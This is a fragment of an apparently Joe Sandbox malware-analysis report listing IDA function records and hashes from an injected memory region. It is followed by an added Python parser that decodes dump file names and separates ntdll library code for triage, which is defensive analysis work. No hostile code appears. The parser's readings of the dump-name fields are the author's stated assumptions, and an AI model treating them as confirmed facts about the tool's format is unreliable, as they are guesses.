                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
                • Instruction ID: d83a220b08ad36b3e1115d5a85d46a29efa0dba09f55de0e3a83abe1233fa2e2
                • Opcode Fuzzy Hash: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
                • Instruction Fuzzy Hash: 0121657AA00519ABDB21DF79DD54AEEBBF8FF94640F04011AE905D7200E730D9018BE1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: def02a83b561a11e69862516c7b997978e87a7291d8a97910725bdd34c6e7980
                • Instruction ID: aed4db35a1c8eca38f46a21936270e4f366272bdd770b464a2c3303f8267f6e6
                • Opcode Fuzzy Hash: def02a83b561a11e69862516c7b997978e87a7291d8a97910725bdd34c6e7980
                • Instruction Fuzzy Hash: BC319572A006199FDB20DF2DDC50BEEB7F8FF54610F95455AE949E7200EB30EA448BA0
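The function records above are emitted by the Joe Sandbox IDA plugin one per recovered function, and every one of them points back at the same memory dump (process 4, region at 01450000). Reading them by hand does not scale, so the following is an added example, written for this page and not part of the Joe Sandbox report or its tooling, of a small parser that ingests records in exactly this layout (a Strings/APIs block, then "Memory Dump Source", then the "Similarity" fields), decodes the .sdmp file name, and summarises what lives in each dumped region. Two things in it are assumptions of mine rather than facts from the report: the field layout of the .sdmp name (process index, dump stage, id, base address, then protection, state and type, which I interpret with the standard winnt.h constants because 00000040/00001000/00020000 match PAGE_EXECUTE_READWRITE/MEM_COMMIT/MEM_PRIVATE), and the heuristic that the SXS/RtlFindActivationContextSection* debug strings are ntdll's own, so a record carrying them indicates ntdll code inside the region rather than the sample's. The sample input is constructed from two of the records on this page.

```python
"""Parse Joe Sandbox IDA-plugin function records and decode their dump names.

Added example for this page; not Joe Sandbox code. The .sdmp field layout and
the ntdll-marker heuristic below are the author's assumptions (see comments).
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# winnt.h memory constants used to interpret the protection/state/type fields.
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000

# ASSUMED layout of the dump file name:
#   <process>.<stage>.<id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)

# Heuristic (author's assumption): these are ntdll's internal SXS debug strings.
NTDLL_SXS_MARKERS = ("SXS:", "RtlFindActivationContextSectionString",
                     "RtlpFindActivationContextSection")


@dataclass
class DumpRegion:
    process: int
    stage: int
    base: int
    protect: int
    state: int
    mtype: int

    @property
    def executable_rwx_private(self) -> bool:
        """Committed, private, RWX memory: the usual shape of injected code."""
        return (self.protect == PAGE_EXECUTE_READWRITE
                and self.state == MEM_COMMIT and self.mtype == MEM_PRIVATE)


@dataclass
class FunctionRecord:
    source: str = ""
    region: Optional[DumpRegion] = None
    api_ids: List[str] = field(default_factory=list)      # "$"-joined on the page
    string_ids: List[str] = field(default_factory=list)   # "$"-joined on the page
    strings: List[Tuple[str, List[int]]] = field(default_factory=list)  # (text, xrefs)
    opcode_id: str = ""
    instruction_id: str = ""
    instruction_fuzzy: str = ""


def decode_sdmp_name(name: str) -> Optional[DumpRegion]:
    """Split the dump file name into its (assumed) fields; None if it does not fit."""
    m = SDMP_RE.match(name)
    if not m:
        return None
    return DumpRegion(process=int(m["pid"], 16), stage=int(m["stage"], 16),
                      base=int(m["base"], 16), protect=int(m["prot"], 16),
                      state=int(m["state"], 16), mtype=int(m["mtype"], 16))


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per block; the Instruction Fuzzy Hash line closes a block."""
    records: List[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings", "Memory Dump Source", "Similarity",
                    "Joe Sandbox IDA Plugin"):
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "Strings":                     # "<text>, xrefs: A, B"
            txt, sep, xr = body.rpartition(", xrefs: ")
            if not sep:
                txt, xr = body, ""
            cur.strings.append((txt, [int(x, 16) for x in xr.split(", ") if x]))
            continue
        key, _, val = body.partition(":")
        key, val = key.strip(), val.strip()
        if key == "Source File":                     # "<name>.sdmp, Offset: ..., based on PE: ..."
            cur.source = val.split(",", 1)[0]
            cur.region = decode_sdmp_name(cur.source)
        elif key == "API ID":
            cur.api_ids = [a for a in val.split("$") if a]
        elif key == "String ID":
            cur.string_ids = [s for s in val.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = val
        elif key == "Instruction ID":
            cur.instruction_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy = val
            records.append(cur)
            cur = FunctionRecord()
    return records


def ntdll_marker_records(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Records whose referenced strings look like ntdll's SXS debug strings (heuristic)."""
    return [r for r in records if any(s.startswith(NTDLL_SXS_MARKERS) for s, _ in r.strings)]


def summarize(records: List[FunctionRecord]) -> Dict[Tuple[int, int], dict]:
    """Per (process, base) region: function count, RWX-private flag, strings, APIs."""
    regions: Dict[Tuple[int, int], dict] = {}
    for r in records:
        if r.region is None:
            continue
        entry = regions.setdefault((r.region.process, r.region.base), {
            "functions": 0, "rwx_private": r.region.executable_rwx_private,
            "with_strings": 0, "apis": set()})
        entry["functions"] += 1
        entry["with_strings"] += int(bool(r.strings))
        entry["apis"].update(r.api_ids)
    return regions


# Constructed sample: two records copied in the page's layout.
SAMPLE = """
Strings
• RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 014E7AE6
• RtlpFindActivationContextSection_CheckParameters, xrefs: 014E79D0, 014E79F5
• SsHd, xrefs: 0149A3E4
Memory Dump Source
• Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
• Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
Similarity
• API ID:
• String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SsHd
• API String ID: 0-1988757188
• Opcode ID: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
• Instruction ID: c38ec2509712e78b65dbeaba078e6982fc2081c288f9d5fe517e6490b407373c
• Opcode Fuzzy Hash: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
• Instruction Fuzzy Hash: 56E1A4716043028FEB25CE68C488B6B7FE1BB84365F244A2FE995CB3A1D731D945CB91
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
• Instruction ID: d83a220b08ad36b3e1115d5a85d46a29efa0dba09f55de0e3a83abe1233fa2e2
• Opcode Fuzzy Hash: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
• Instruction Fuzzy Hash: 0121657AA00519ABDB21DF79DD54AEEBBF8FF94640F04011AE905D7200E730D9018BE1
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (pid, base), info in summarize(recs).items():
        print(f"process {pid} region {base:#x}: {info['functions']} functions, "
              f"rwx_private={info['rwx_private']}, apis={sorted(info['apis'])}")
    print("records with ntdll SXS strings:",
          [r.opcode_id[:12] for r in ntdll_marker_records(recs)])
```

Fed the full record list from this page, the summary collapses the thousands of lines into one row per dumped region: how many functions IDA recovered there, whether the region is private committed RWX (which it is for 01450000, consistent with the hollowing and injection signatures in the report summary), which Win32/CRT APIs the records resolve, and which functions carry ntdll's SXS strings. That last bucket is worth separating because functions that reference ntdll-internal strings are library code the analyst can skip, while the remaining records in the same region are the ones that need manual review.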